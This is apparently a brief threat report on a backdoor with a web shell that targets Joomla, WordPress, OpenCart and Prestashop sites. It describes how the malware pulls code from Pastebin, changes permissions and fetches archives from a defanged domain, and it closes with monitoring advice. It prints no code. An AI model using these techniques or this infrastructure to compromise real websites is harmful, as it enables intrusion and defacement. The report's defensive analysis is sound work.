This report is about a backdoor with a shell capability that targets a variety of content management systems (CMS). Based on the security researcher’s findings, there is a strong indication that the malware was created by a bad actor who speaks the Turkish language. The backdoor is built to inject content into the infected website.
The malware is designed to target a variety of content management systems by looking for core files such as /includes/defines.php for Joomla. The malware starts the infection chain by modifying the permissions for specified system files and pulling down code from the popular website called Pastebin. The permissions changes to 644 on specified files giving the owner read and write access with groups only having read access. The code is pulled down using a customized cURL request via http_get() using a generated Pastebin link. The malware first checks if Joomla is installed and then looks for the following CMS’s: WordPress, OpenCart, and Prestashop.
The initial script written onto the webserver looks like this:
When targeting Joomla systems, the malware downloads zip files called joomlahide.zip and joomla.zip from the domain shellx[.]org. One zip file contains a backdoor built for uploading files and the other archive contains the An0n_3xPloiTeR web shell. The An0n_3xPloiTeR is designed to deface websites, change the colors of the site, inject code, logout/self-removal options, and much more.
It is highly encouraged that you monitor your web presence for changes to key files using file integrity monitoring. Consider deploying an Ossec agent if you use AlienVault or turning on the AIE rules for FIM (File Integrity Monitoring) in LogRhythm. Maintain a decent number of backups of your website onsite and offsite as a precaution against a potential compromise.